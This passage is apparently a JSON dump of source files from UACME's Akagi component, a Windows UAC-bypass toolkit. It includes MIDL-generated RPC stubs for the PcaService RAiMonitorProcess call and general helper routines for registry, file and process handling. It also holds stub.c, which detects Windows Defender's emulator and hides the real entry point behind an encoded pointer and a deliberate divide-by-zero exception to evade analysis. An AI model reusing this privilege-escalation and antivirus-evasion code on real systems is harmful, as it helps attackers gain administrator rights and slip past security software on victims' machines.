stub.\n#endif\n\n#if !(TARGET_IS_NT50_OR_LATER)\n#error You need Windows 2000 or later to run this stub because it uses these features:\n#error /robust command line switch.\n#error However, your C/C++ compilation flags indicate you intend to run this app on earlier systems.\n#error This app will fail with the RPC_X_WRONG_STUB_VERSION error.\n#endif\n\n\nstatic const pcasvc_MIDL_PROC_FORMAT_STRING pcasvc__MIDL_ProcFormatString =\n {\n 0,\n {\n\n\t/* Procedure RAiMonitorProcess */\n\n\t\t\t0x0,\t\t/* 0 */\n\t\t\t0x48,\t\t/* Old Flags: */\n/* 2 */\tNdrFcLong( 0x0 ),\t/* 0 */\n/* 6 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 8 */\tNdrFcShort( 0x20 ),\t/* x86 Stack size/offset = 32 */\n/* 10 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\n\t\t\t0x0,\t\t/* 0 */\n/* 12 */\tNdrFcShort( 0x0 ),\t/* x86 Stack size/offset = 0 */\n/* 14 */\tNdrFcShort( 0x18 ),\t/* 24 */\n/* 16 */\tNdrFcShort( 0x8 ),\t/* 8 */\n/* 18 */\t0x46,\t\t/* Oi2 Flags: clt must size, has return, has ext, */\n\t\t\t0x7,\t\t/* 7 */\n/* 20 */\t0x8,\t\t/* 8 */\n\t\t\t0x1,\t\t/* Ext Flags: new corr desc, */\n/* 22 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 24 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\n\n\t/* Parameter hProcess */\n\n/* 28 */\tNdrFcShort( 0x48 ),\t/* Flags: in, base type, */\n/* 30 */\tNdrFcShort( 0x4 ),\t/* x86 Stack size/offset = 4 */\n/* 32 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter unknown0 */\n\n/* 34 */\tNdrFcShort( 0x48 ),\t/* Flags: in, base type, */\n/* 36 */\tNdrFcShort( 0x8 ),\t/* x86 Stack size/offset = 8 */\n/* 38 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter exeFileName */\n\n/* 40 */\tNdrFcShort( 0xb ),\t/* Flags: must size, must free, in, */\n/* 42 */\tNdrFcShort( 0xc ),\t/* x86 Stack size/offset = 12 */\n/* 44 */\tNdrFcShort( 0x2 ),\t/* Type Offset=2 */\n\n\t/* Parameter cmdLine */\n\n/* 46 */\tNdrFcShort( 0xb ),\t/* Flags: must size, must free, in, */\n/* 48 */\tNdrFcShort( 0x10 ),\t/* x86 Stack size/offset = 16 */\n/* 50 */\tNdrFcShort( 0x2 ),\t/* Type Offset=2 */\n\n\t/* Parameter workingDir */\n\n/* 52 */\tNdrFcShort( 0xb ),\t/* Flags: must size, must free, in, */\n/* 54 */\tNdrFcShort( 0x14 ),\t/* x86 Stack size/offset = 20 */\n/* 56 */\tNdrFcShort( 0x2 ),\t/* Type Offset=2 */\n\n\t/* Parameter flags */\n\n/* 58 */\tNdrFcShort( 0x48 ),\t/* Flags: in, base type, */\n/* 60 */\tNdrFcShort( 0x18 ),\t/* x86 Stack size/offset = 24 */\n/* 62 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Return value */\n\n/* 64 */\tNdrFcShort( 0x70 ),\t/* Flags: out, return, base type, */\n/* 66 */\tNdrFcShort( 0x1c ),\t/* x86 Stack size/offset = 28 */\n/* 68 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t\t\t0x0\n }\n };\n\nstatic const pcasvc_MIDL_TYPE_FORMAT_STRING pcasvc__MIDL_TypeFormatString =\n {\n 0,\n {\n\t\t\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 2 */\t\n\t\t\t0x12, 0x8,\t/* FC_UP [simple_pointer] */\n/* 4 */\t\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\n\t\t\t0x5c,\t\t/* FC_PAD */\n\n\t\t\t0x0\n }\n };\n\nstatic const unsigned short PcaService_FormatStringOffsetTable[] =\n {\n 0\n };\n\n\nstatic const MIDL_STUB_DESC PcaService_StubDesc = \n {\n (void *)& PcaService___RpcClientInterface,\n MIDL_user_allocate,\n MIDL_user_free,\n &PcaService__MIDL_AutoBindHandle,\n 0,\n 0,\n 0,\n 0,\n pcasvc__MIDL_TypeFormatString.Format,\n 1, /* -error bounds_check flag */\n 0x50002, /* Ndr library version */\n 0,\n 0x8010272, /* MIDL Version 8.1.626 */\n 0,\n 0,\n 0, /* notify & notify_flag routine table */\n 0x1, /* MIDL flag */\n 0, /* cs routines */\n 0, /* proxy/server info */\n 0\n };\n#if _MSC_VER >= 1200\n#pragma warning(pop)\n#endif\n\n#else\n#pragma warning(disable:4206)\n#endif /* !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_) */\n\n"
},
{
"path": "Source/Akagi/pcasvc/w8_10/x86-32/pcasvc32.h",
"content": "\n\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\n\n\n /* File created by MIDL compiler version 8.01.0626 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for pcasvc.idl:\n Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0626 \n protocol : dce , ms_ext, c_ext, robust\n error checks: allocation ref bounds_check enum stub_data \n VC __declspec() decoration level: \n __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING( ) */\n\n#pragma warning( disable: 4049 ) /* more than 64k source lines */\n\n\n/* verify that the version is high enough to compile this file*/\n#ifndef __REQUIRED_RPCNDR_H_VERSION__\n#define __REQUIRED_RPCNDR_H_VERSION__ 475\n#endif\n\n#include \"rpc.h\"\n#include \"rpcndr.h\"\n\n#ifndef __RPCNDR_H_VERSION__\n#error this stub requires an updated version of \n#endif /* __RPCNDR_H_VERSION__ */\n\n\n#ifndef __pcasvc32_h__\n#define __pcasvc32_h__\n\n#if defined(_MSC_VER) && (_MSC_VER >= 1020)\n#pragma once\n#endif\n\n#ifndef DECLSPEC_XFGVIRT\n#if _CONTROL_FLOW_GUARD_XFG\n#define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func))\n#else\n#define DECLSPEC_XFGVIRT(base, func)\n#endif\n#endif\n\n/* Forward Declarations */ \n\n#ifdef __cplusplus\nextern \"C\"{\n#endif \n\n\n#ifndef __PcaService_INTERFACE_DEFINED__\n#define __PcaService_INTERFACE_DEFINED__\n\n/* interface PcaService */\n/* [explicit_handle][version][uuid] */ \n\nlong RAiMonitorProcess( \n handle_t bindingHandle,\n /* [in] */ unsigned __int3264 hProcess,\n /* [in] */ long unknown0,\n /* [string][unique][in] */ wchar_t *exeFileName,\n /* [string][unique][in] */ wchar_t *cmdLine,\n /* [string][unique][in] */ wchar_t *workingDir,\n /* [in] */ long flags);\n\n\n\nextern RPC_IF_HANDLE PcaService_v1_0_c_ifspec;\nextern RPC_IF_HANDLE PcaService_v1_0_s_ifspec;\n#endif /* __PcaService_INTERFACE_DEFINED__ */\n\n/* Additional Prototypes for ALL interfaces */\n\n/* end of Additional Prototypes */\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif\n\n\n"
},
{
"path": "Source/Akagi/stub.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2018 - 2022\n*\n* TITLE: STUB.C\n*\n* VERSION: 3.62\n*\n* DATE: 08 Jul 2022\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\nTEB_ACTIVE_FRAME_CONTEXT g_fctx = { 0, \"(*^-^*)\" };\n\n/*\n* ucmSehHandler\n*\n* Purpose:\n*\n* Program entry point seh handler, indirect control passing.\n*\n*/\nINT ucmSehHandler(\n _In_ UINT ExceptionCode,\n _In_ EXCEPTION_POINTERS* ExceptionInfo\n)\n{\n UACME_THREAD_CONTEXT* uctx;\n\n UNREFERENCED_PARAMETER(ExceptionInfo);\n\n if (ExceptionCode == STATUS_INTEGER_DIVIDE_BY_ZERO) {\n uctx = (UACME_THREAD_CONTEXT*)RtlGetFrame();\n while ((uctx != NULL) && (uctx->Frame.Context != &g_fctx)) {\n uctx = (UACME_THREAD_CONTEXT*)uctx->Frame.Previous;\n }\n if (uctx) {\n if (uctx->ucmMain) {\n uctx->ucmMain = (pfnEntryPoint)supDecodePointer(uctx->ucmMain);\n\n uctx->ReturnedResult = uctx->ucmMain(UacMethodInvalid,\n NULL,\n 0);\n }\n }\n return EXCEPTION_EXECUTE_HANDLER;\n }\n return EXCEPTION_CONTINUE_SEARCH;\n}\n\nDWORD StubInit(\n _In_ PVOID EntryPoint)\n{\n int v = 1, d = 0;\n UACME_THREAD_CONTEXT uctx;\n\n RtlSecureZeroMemory(&uctx, sizeof(uctx));\n\n if (wdIsEmulatorPresent() == STATUS_NOT_SUPPORTED) {\n\n uctx.Frame.Context = &g_fctx;\n\n uctx.ucmMain = (pfnEntryPoint)supEncodePointer(EntryPoint);\n RtlPushFrame((PTEB_ACTIVE_FRAME)&uctx);\n\n __try {\n v = (int)USER_SHARED_DATA->NtProductType;\n d = (int)USER_SHARED_DATA->AlternativeArchitecture;\n v = (int)(v / d);\n }\n __except (ucmSehHandler(GetExceptionCode(), GetExceptionInformation())) {\n v = 1;\n }\n\n RtlPopFrame((PTEB_ACTIVE_FRAME)&uctx);\n }\n\n if (v)\n return uctx.ReturnedResult;\n else\n return (DWORD)STATUS_ACCESS_DENIED;\n}\n"
},
{
"path": "Source/Akagi/stub.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2018 - 2022\n*\n* TITLE: STUB.H\n*\n* VERSION: 3.59\n*\n* DATE: 02 Feb 2022\n* \n* Kuma stub header file\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\nDWORD StubInit(_In_ PVOID EntryPoint);\n"
},
{
"path": "Source/Akagi/sup.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2015 - 2026\n*\n* TITLE: SUP.C\n*\n* VERSION: 3.69\n*\n* DATE: 12 Feb 2026\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n#include \"uas.h\"\n\n//\n// Signatures array.\n//\nUSER_ASSOC_SIGNATURE* g_UserAssocSignatures[] = {\n &UAS_SIG_7601,\n &UAS_SIG_9600,\n &UAS_SIG_14393,\n &UAS_SIG_17763,\n &UAS_SIG_18362,\n &UAS_SIG_18363,\n &UAS_SIG_19041,\n &UAS_SIG_19042_19043,\n &UAS_SIG_22000,\n &UAS_SIG_22621,\n &UAS_SIG_26100\n};\n\n#if defined(__cplusplus)\nextern \"C\" {\n#endif\n\n _Must_inspect_result_\n _Ret_maybenull_ _Post_writable_byte_size_(size)\n void* __RPC_USER MIDL_user_allocate(_In_ size_t size)\n {\n return((void __RPC_FAR*) supHeapAlloc(size));\n }\n\n#pragma warning(push)\n#pragma warning(disable: 6387)\n#pragma warning(disable: 6001)\n void __RPC_USER MIDL_user_free(_Pre_maybenull_ _Post_invalid_ void* p)\n {\n supHeapFree(p);\n }\n#pragma warning(pop)\n\n#if defined(__cplusplus)\n}\n#endif\n\n/*\n* supEncodePointer\n*\n* Purpose:\n*\n* Encodes the specified pointer.\n*\n*/\nPVOID supEncodePointer(\n _In_ PVOID Pointer)\n{\n NTSTATUS Status;\n ULONG Cookie, retLength;\n\n if ((g_ctx == NULL) || (g_ctx->Cookie == 0)) {\n\n Status = NtQueryInformationProcess(\n NtCurrentProcess(),\n ProcessCookie,\n &Cookie,\n sizeof(ULONG),\n &retLength);\n\n if (!NT_SUCCESS(Status))\n RtlRaiseStatus(Status);\n\n if (g_ctx)\n g_ctx->Cookie = Cookie;\n\n }\n else {\n Cookie = g_ctx->Cookie;\n }\n\n#ifdef _WIN64\n return (PVOID)(RotateRight64(\n (ULONG_PTR)Pointer ^ Cookie,\n Cookie & 0x3f));\n#else\n return (PVOID)(RotateRight32(\n (ULONG_PTR)Pointer ^ Cookie,\n Cookie & 0x1f));\n#endif\n}\n\n/*\n* supDecodePointer\n*\n* Purpose:\n*\n* Decodes the specified pointer.\n*\n*/\nPVOID supDecodePointer(\n _In_ PVOID Pointer)\n{\n NTSTATUS Status;\n ULONG Cookie, retLength;\n\n if ((g_ctx == NULL) || (g_ctx->Cookie == 0)) {\n\n Status = NtQueryInformationProcess(\n NtCurrentProcess(),\n ProcessCookie,\n &Cookie,\n sizeof(ULONG),\n &retLength);\n\n if (!NT_SUCCESS(Status))\n RtlRaiseStatus(Status);\n\n if (g_ctx)\n g_ctx->Cookie = Cookie;\n\n }\n else {\n Cookie = g_ctx->Cookie;\n }\n\n#ifdef _WIN64\n return (PVOID)(RotateRight64(\n (ULONG_PTR)Pointer,\n 0x40 - (Cookie & 0x3f)) ^ Cookie);\n#else\n return (PVOID)(RotateRight32(\n (ULONG_PTR)Pointer,\n 0x20 - (Cookie & 0x1f)) ^ Cookie);\n#endif\n}\n\n/*\n* supVirtualAlloc\n*\n* Purpose:\n*\n* Wrapper for NtAllocateVirtualMemory.\n*\n*/\nPVOID supVirtualAlloc(\n _Inout_ PSIZE_T Size,\n _In_ ULONG AllocationType,\n _In_ ULONG Protect,\n _Out_opt_ NTSTATUS* Status)\n{\n NTSTATUS status;\n PVOID Buffer = NULL;\n SIZE_T size;\n\n size = *Size;\n\n status = NtAllocateVirtualMemory(\n NtCurrentProcess(),\n &Buffer,\n 0,\n &size,\n AllocationType,\n Protect);\n\n if (NT_SUCCESS(status)) {\n RtlSecureZeroMemory(Buffer, size);\n }\n\n *Size = size;\n if (Status) *Status = status;\n\n return Buffer;\n}\n\n/*\n* supVirtualFree\n*\n* Purpose:\n*\n* Wrapper for NtFreeVirtualMemory.\n*\n*/\nBOOL supVirtualFree(\n _In_ PVOID Memory,\n _Out_opt_ NTSTATUS* Status)\n{\n NTSTATUS status = STATUS_UNSUCCESSFUL;\n SIZE_T size = 0;\n\n status = NtFreeVirtualMemory(\n NtCurrentProcess(),\n &Memory,\n &size,\n MEM_RELEASE);\n\n if (Status) *Status = status;\n\n return NT_SUCCESS(status);\n}\n\n/*\n* supSecureVirtualFree\n*\n* Purpose:\n*\n* Wrapper for NtFreeVirtualMemory.\n*\n*/\nBOOL supSecureVirtualFree(\n _In_ PVOID Memory,\n _In_ SIZE_T MemorySize,\n _Out_opt_ NTSTATUS* Status)\n{\n RtlSecureZeroMemory(Memory, MemorySize);\n return supVirtualFree(Memory, Status);\n}\n\n/*\n* supHeapAlloc\n*\n* Purpose:\n*\n* Wrapper for RtlAllocateHeap with ucmHeap.\n*\n*/\nPVOID FORCEINLINE supHeapAlloc(\n _In_ SIZE_T Size)\n{\n return RtlAllocateHeap(g_ctx->ucmHeap, HEAP_ZERO_MEMORY, Size);\n}\n\n/*\n* supHeapFree\n*\n* Purpose:\n*\n* Wrapper for RtlFreeHeap with ucmHeap.\n*\n*/\nBOOL FORCEINLINE supHeapFree(\n _In_ PVOID Memory)\n{\n return RtlFreeHeap(g_ctx->ucmHeap, 0, Memory);\n}\n\n/*\n* supIsProcess32bit\n*\n* Purpose:\n*\n* Return TRUE if given process is under WOW64, FALSE otherwise.\n*\n*/\nBOOLEAN supIsProcess32bit(\n _In_ HANDLE hProcess\n)\n{\n NTSTATUS status;\n PROCESS_EXTENDED_BASIC_INFORMATION pebi;\n\n if (hProcess == NULL) {\n return FALSE;\n }\n\n //query if this is wow64 process\n RtlSecureZeroMemory(&pebi, sizeof(pebi));\n pebi.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION);\n status = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pebi, sizeof(pebi), NULL);\n if (NT_SUCCESS(status)) {\n return (pebi.IsWow64Process == 1);\n }\n return FALSE;\n}\n\n/*\n* supGetElevationType\n*\n* Purpose:\n*\n* Returns client elevation type.\n*\n*/\nBOOL supGetElevationType(\n _Out_ TOKEN_ELEVATION_TYPE* lpType\n)\n{\n HANDLE hToken = NULL;\n NTSTATUS status;\n ULONG bytesRead = 0;\n TOKEN_ELEVATION_TYPE TokenType = TokenElevationTypeDefault;\n\n status = NtOpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken);\n if (NT_SUCCESS(status)) {\n\n status = NtQueryInformationToken(hToken, TokenElevationType, &TokenType,\n sizeof(TOKEN_ELEVATION_TYPE), &bytesRead);\n\n NtClose(hToken);\n }\n\n supSetLastErrorFromNtStatus(status);\n\n if (lpType)\n *lpType = TokenType;\n\n return (NT_SUCCESS(status));\n}\n\n/*\n* supWriteBufferToFile\n*\n* Purpose:\n*\n* Create new file and write buffer to it.\n*\n*/\nBOOL supWriteBufferToFile(\n _In_ LPCWSTR lpFileName,\n _In_opt_ PVOID Buffer,\n _In_ DWORD BufferSize\n)\n{\n HANDLE hFile;\n DWORD bytesIO = 0;\n\n if ((Buffer == NULL) || (BufferSize == 0))\n return FALSE;\n\n hFile = CreateFile(lpFileName,\n GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);\n\n if (hFile != INVALID_HANDLE_VALUE) {\n WriteFile(hFile, Buffer, BufferSize, &bytesIO, NULL);\n CloseHandle(hFile);\n }\n else {\n#ifdef _DEBUG\n supDebugPrint(TEXT(\"CreateFile\"), GetLastError());\n#endif\n return FALSE;\n }\n\n return (bytesIO == BufferSize);\n}\n\n/*\n* supDebugPrint\n*\n* Purpose:\n*\n* Write formatted debug output.\n*\n*/\nVOID supDebugPrint(\n _In_ LPCWSTR ApiName,\n _In_ DWORD status\n)\n{\n HANDLE Heap;\n LPWSTR lpBuffer;\n SIZE_T sz;\n\n sz = MAX_PATH;\n if (ApiName)\n sz += _strlen(ApiName);\n\n if (g_ctx == NULL) {\n Heap = NtCurrentPeb()->ProcessHeap;\n }\n else {\n Heap = g_ctx->ucmHeap;\n }\n\n lpBuffer = (LPWSTR)RtlAllocateHeap(Heap, HEAP_ZERO_MEMORY, sz * sizeof(WCHAR));\n if (lpBuffer) {\n _strcpy(lpBuffer, TEXT(\"[UCM] \"));\n if (ApiName) {\n _strcat(lpBuffer, ApiName);\n }\n _strcat(lpBuffer, TEXT(\" code = 0x\"));\n ultohex(status, _strend(lpBuffer));\n _strcat(lpBuffer, TEXT(\"\\n\"));\n OutputDebugString(lpBuffer);\n RtlFreeHeap(Heap, 0, lpBuffer);\n }\n\n}\n\n/*\n* supRegWriteValue\n*\n* Purpose:\n*\n* Write value to the registry.\n*\n*/\nNTSTATUS supRegWriteValue(\n _In_ HANDLE hKey,\n _In_opt_ LPWSTR ValueName,\n _In_ DWORD ValueType,\n _In_ PVOID ValueData,\n _In_ ULONG ValueDataSize\n)\n{\n UNICODE_STRING usValue;\n\n if (ValueName) {\n\n RtlInitUnicodeString(&usValue, ValueName);\n\n }\n else {\n\n RtlInitEmptyUnicodeString(&usValue, NULL, 0);\n\n }\n\n return NtSetValueKey(hKey,\n &usValue,\n 0,\n ValueType,\n ValueData,\n ValueDataSize);\n}\n\n/*\n* supRegCurrentUserDeleteSubKeyValue\n*\n* Purpose:\n*\n* Remove value of the given subkey.\n*\n*/\nNTSTATUS supRegCurrentUserDeleteSubKeyValue(\n _In_ LPWSTR SubKey,\n _In_ LPWSTR ValueName)\n{\n NTSTATUS ntStatus;\n HANDLE hRootKey = NULL, hSubKey = NULL;\n OBJECT_ATTRIBUTES obja;\n UNICODE_STRING usSubKey, usValueName, usRootKey;\n\n ntStatus = RtlFormatCurrentUserKeyPath(&usRootKey);\n if (NT_SUCCESS(ntStatus)) {\n\n InitializeObjectAttributes(&obja, &usRootKey, OBJ_CASE_INSENSITIVE, NULL, NULL);\n ntStatus = NtOpenKey(&hRootKey, MAXIMUM_ALLOWED, &obja);\n if (NT_SUCCESS(ntStatus)) {\n\n RtlInitUnicodeString(&usSubKey, SubKey);\n\n obja.RootDirectory = hRootKey;\n obja.ObjectName = &usSubKey;\n ntStatus = NtOpenKey(&hSubKey, MAXIMUM_ALLOWED, &obja);\n if (NT_SUCCESS(ntStatus)) {\n RtlInitUnicodeString(&usValueName, ValueName);\n ntStatus = NtDeleteValueKey(hSubKey, &usValueName);\n NtClose(hSubKey);\n }\n\n NtClose(hRootKey);\n }\n\n RtlFreeUnicodeString(&usRootKey);\n }\n return ntStatus;\n}\n\n/*\n* supRegReadValue\n*\n* Purpose:\n*\n* Read given value to output buffer.\n* Returned Buffer must be released with RtlFreeHeap after use.\n*\n*/\nNTSTATUS supRegReadValue(\n _In_ HANDLE hKey,\n _In_ LPWSTR ValueName,\n _In_ DWORD ValueType,\n _Out_ PVOID* Buffer,\n _Out_ ULONG* BufferSize,\n _In_opt_ HANDLE hHeap\n)\n{\n KEY_VALUE_PARTIAL_INFORMATION* kvpi;\n UNICODE_STRING usName;\n NTSTATUS Status = STATUS_UNSUCCESSFUL;\n ULONG Length = 0;\n PVOID CopyBuffer = NULL;\n HANDLE Heap;\n\n *Buffer = NULL;\n *BufferSize = 0;\n\n if (hHeap == NULL)\n Heap = NtCurrentPeb()->ProcessHeap;\n else\n Heap = hHeap;\n\n RtlInitUnicodeString(&usName, ValueName);\n Status = NtQueryValueKey(hKey, &usName, KeyValuePartialInformation, NULL, 0, &Length);\n if (Status == STATUS_BUFFER_TOO_SMALL) {\n\n kvpi = (KEY_VALUE_PARTIAL_INFORMATION*)RtlAllocateHeap(Heap, HEAP_ZERO_MEMORY, Length);\n if (kvpi) {\n\n Status = NtQueryValueKey(hKey, &usName, KeyValuePartialInformation, kvpi, Length, &Length);\n if (NT_SUCCESS(Status)) {\n\n if (kvpi->Type == ValueType) {\n\n CopyBuffer = RtlAllocateHeap(Heap, HEAP_ZERO_MEMORY, kvpi->DataLength);\n if (CopyBuffer) {\n RtlCopyMemory(CopyBuffer, kvpi->Data, kvpi->DataLength);\n *Buffer = CopyBuffer;\n *BufferSize = kvpi->DataLength;\n Status = STATUS_SUCCESS;\n }\n else {\n Status = STATUS_NO_MEMORY;\n }\n }\n else {\n Status = STATUS_OBJECT_TYPE_MISMATCH;\n }\n }\n RtlFreeHeap(Heap, 0, kvpi);\n }\n else {\n Status = STATUS_NO_MEMORY;\n }\n }\n\n return Status;\n}\n\n/*\n* supReadFileToBuffer\n*\n* Purpose:\n*\n* Read file to buffer. Release memory when it no longer needed.\n*\n*/\nPBYTE supReadFileToBuffer(\n _In_ LPCWSTR lpFileName,\n _Inout_opt_ LPDWORD lpBufferSize\n)\n{\n NTSTATUS status;\n HANDLE hFile = NULL;\n PBYTE Buffer = NULL;\n SIZE_T sz = 0;\n\n UNICODE_STRING usName;\n OBJECT_ATTRIBUTES attr;\n IO_STATUS_BLOCK iost;\n FILE_STANDARD_INFORMATION fi;\n\n do {\n\n if (lpFileName == NULL)\n return NULL;\n\n if (!RtlDosPathNameToNtPathName_U(lpFileName, &usName, NULL, NULL))\n break;\n\n InitializeObjectAttributes(&attr, &usName, OBJ_CASE_INSENSITIVE, 0, NULL);\n\n status = NtCreateFile(\n &hFile,\n FILE_READ_DATA | SYNCHRONIZE,\n &attr,\n &iost,\n NULL,\n FILE_ATTRIBUTE_NORMAL,\n FILE_SHARE_READ,\n FILE_OPEN,\n FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT,\n NULL,\n 0);\n\n RtlFreeUnicodeString(&usName);\n\n if (!NT_SUCCESS(status)) {\n break;\n }\n\n RtlSecureZeroMemory(&fi, sizeof(fi));\n\n status = NtQueryInformationFile(\n hFile,\n &iost,\n &fi,\n sizeof(FILE_STANDARD_INFORMATION),\n FileStandardInformation);\n\n if (!NT_SUCCESS(status))\n break;\n\n sz = (SIZE_T)fi.EndOfFile.LowPart;\n\n Buffer = (PBYTE)supVirtualAlloc(\n &sz,\n DEFAULT_ALLOCATION_TYPE,\n DEFAULT_PROTECT_TYPE,\n &status);\n\n if (NT_SUCCESS(status)) {\n\n status = NtReadFile(\n hFile,\n NULL,\n NULL,\n NULL,\n &iost,\n Buffer,\n fi.EndOfFile.LowPart,\n NULL,\n NULL);\n\n if (NT_SUCCESS(status)) {\n if (lpBufferSize)\n *lpBufferSize = fi.EndOfFile.LowPart;\n }\n else {\n supVirtualFree(Buffer, NULL);\n Buffer = NULL;\n }\n }\n\n } while (FALSE);\n\n if (hFile != NULL) {\n NtClose(hFile);\n }\n\n return Buffer;\n}\n\n/*\n* supRunProcess3\n*\n* Purpose:\n*\n* ShellExecuteEx given process with given parameters and return handle to it.\n*\n*/\nHANDLE supRunProcess3(\n _In_ LPCWSTR lpFile,\n _In_opt_ LPCWSTR lpParameters,\n _In_opt_ LPCWSTR lpVerb,\n _In_ INT nShow\n)\n{\n SHELLEXECUTEINFO shinfo;\n\n RtlSecureZeroMemory(&shinfo, sizeof(shinfo));\n shinfo.cbSize = sizeof(shinfo);\n shinfo.fMask = SEE_MASK_FLAG_NO_UI | SEE_MASK_NOCLOSEPROCESS;\n shinfo.lpFile = lpFile;\n shinfo.lpParameters = lpParameters;\n shinfo.nShow = nShow;\n shinfo.lpVerb = lpVerb;\n if (ShellExecuteEx(&shinfo))\n return shinfo.hProcess;\n\n return NULL;\n}\n\n/*\n* supRunProcess2\n*\n* Purpose:\n*\n* Execute given process with given parameters and wait if specified.\n*\n*/\nBOOL supRunProcess2(\n _In_ LPCWSTR lpFile,\n _In_opt_ LPCWSTR lpParameters,\n _In_opt_ LPCWSTR lpVerb,\n _In_ INT nShow,\n _In_ ULONG mTimeOut\n)\n{\n BOOL bResult = FALSE;\n HANDLE hProcess = supRunProcess3(lpFile,\n lpParameters,\n lpVerb,\n nShow);\n\n if (hProcess) {\n if (mTimeOut != 0) {\n if (WaitForSingleObject(hProcess, mTimeOut) == WAIT_TIMEOUT)\n TerminateProcess(hProcess, WAIT_TIMEOUT);\n }\n CloseHandle(hProcess);\n bResult = TRUE;\n }\n return bResult;\n}\n\n/*\n* supRunProcess\n*\n* Purpose:\n*\n* Execute given process with given parameters.\n*\n*/\nBOOL supRunProcess(\n _In_ LPCWSTR lpFile,\n _In_opt_ LPCWSTR lpParameters\n)\n{\n return supRunProcess2(lpFile,\n lpParameters,\n NULL,\n SW_SHOW,\n SUPRUNPROCESS_TIMEOUT_DEFAULT);\n}\n\n/*\n* supCopyMemory\n*\n* Purpose:\n*\n* Copies bytes between buffers.\n*\n* dest - Destination buffer\n* cbdest - Destination buffer size in bytes\n* src - Source buffer\n* cbsrc - Source buffer size in bytes\n*\n*/\nvoid supCopyMemory(\n _Inout_ void* dest,\n _In_ size_t cbdest,\n _In_ const void* src,\n _In_ size_t cbsrc\n)\n{\n char* d = (char*)dest;\n char* s = (char*)src;\n\n if ((dest == 0) || (src == 0) || (cbdest == 0))\n return;\n if (cbdest < cbsrc)\n cbsrc = cbdest;\n\n while (cbsrc > 0) {\n *d++ = *s++;\n cbsrc--;\n }\n}\n\n/*\n* supQueryEnvironmentVariableOffset\n*\n* Purpose:\n*\n* Return offset to the given environment variable.\n*\n*/\nLPWSTR supQueryEnvironmentVariableOffset(\n _In_ PUNICODE_STRING Value\n)\n{\n UNICODE_STRING str1;\n PWCHAR EnvironmentBlock, ptr;\n\n EnvironmentBlock = (PWCHAR)RtlGetCurrentPeb()->ProcessParameters->Environment;\n ptr = EnvironmentBlock;\n\n do {\n if (*ptr == 0)\n return 0;\n\n RtlInitUnicodeString(&str1, ptr);\n if (RtlPrefixUnicodeString(Value, &str1, TRUE))\n break;\n\n ptr += _strlen(ptr) + 1;\n\n } while (1);\n\n return (ptr + Value->Length / sizeof(WCHAR));\n}\n\n/*\n* supChkSum\n*\n* Purpose:\n*\n* Calculate partial checksum for given buffer.\n*\n*/\nUSHORT supChkSum(\n ULONG PartialSum,\n PUSHORT Source,\n ULONG Length\n)\n{\n while (Length--) {\n PartialSum += *Source++;\n PartialSum = (PartialSum >> 16) + (PartialSum & 0xffff);\n }\n return (USHORT)(((PartialSum >> 16) + PartialSum) & 0xffff);\n}\n\n/*\n* supCalculateCheckSumForMappedFile\n*\n* Purpose:\n*\n* Calculate PE file checksum.\n*\n*/\nDWORD supCalculateCheckSumForMappedFile(\n _In_ PVOID BaseAddress,\n _In_ ULONG FileLength\n)\n{\n PUSHORT AdjustSum;\n PIMAGE_NT_HEADERS NtHeaders;\n USHORT PartialSum;\n ULONG CheckSum;\n\n PartialSum = supChkSum(0, (PUSHORT)BaseAddress, (FileLength + 1) >> 1);\n\n NtHeaders = RtlImageNtHeader(BaseAddress);\n if (NtHeaders != NULL) {\n AdjustSum = (PUSHORT)(&NtHeaders->OptionalHeader.CheckSum);\n PartialSum -= (PartialSum < AdjustSum[0]);\n PartialSum -= AdjustSum[0];\n PartialSum -= (PartialSum < AdjustSum[1]);\n PartialSum -= AdjustSum[1];\n }\n else\n {\n PartialSum = 0;\n 